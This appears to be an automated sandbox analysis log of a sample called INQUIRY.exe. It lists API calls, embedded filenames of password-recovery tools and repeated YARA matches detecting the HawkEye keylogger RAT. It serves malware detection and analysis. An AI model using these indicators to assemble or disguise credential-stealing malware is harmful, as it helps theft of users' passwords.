                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,0_2_0043A6DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0042E904 NtdllDefWindowProc_A,0_2_0042E904
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00490159 NtCreateSection,1_2_00490159
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004557F8 NtdllDefWindowProc_A,2_2_004557F8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,2_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043A6DC NtdllDefWindowProc_A,GetCapture,2_2_0043A6DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0042E904 NtdllDefWindowProc_A,2_2_0042E904
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00455F74
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C80_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046F74C0_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004759E00_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044FECC0_2_0044FECC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C80_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046F74C0_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004759E00_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044FECC0_2_0044FECC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D4261_2_0040D426
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D5231_2_0040D523
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0041D5AE1_2_0041D5AE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004176461_2_00417646
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D6C41_2_0040D6C4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004429BE1_2_004429BE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00446AF41_2_00446AF4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0046ABFC1_2_0046ABFC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463C4D1_2_00463C4D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463CBE1_2_00463CBE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040ED031_2_0040ED03
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463D2F1_2_00463D2F
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463DC01_2_00463DC0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040CF921_2_0040CF92
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0041AFA61_2_0041AFA6
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F13D1_2_0048F13D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004899761_2_00489976
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004F90171_2_004F9017
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004F90A81_2_004F90A8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004A227A1_2_004A227A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004B028E1_2_004B028E
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0043C7BC1_2_0043C7BC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044A3C82_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0046F74C2_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004759E02_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044FECC2_2_0044FECC
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404DDB5_2_00404DDB
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040BD8A5_2_0040BD8A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404E4C5_2_00404E4C
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404EBD5_2_00404EBD
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404F4E5_2_00404F4E
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004044196_2_00404419
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004045166_2_00404516
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004135386_2_00413538
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004145A16_2_004145A1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040E6396_2_0040E639
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004337AF6_2_004337AF
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004399B16_2_004399B1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0043DAE76_2_0043DAE7
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00405CF66_2_00405CF6
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00403F856_2_00403F85
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411F996_2_00411F99
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004035DC appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00404348 appears 78 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004039A8 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004035DC appears 70 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0040436C appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004066E0 appears 32 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0044BA9D appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00403E24 appears 34 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0040C2F0 appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00404348 appears 156 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004039A8 appears 80 times
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: INQUIRY.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
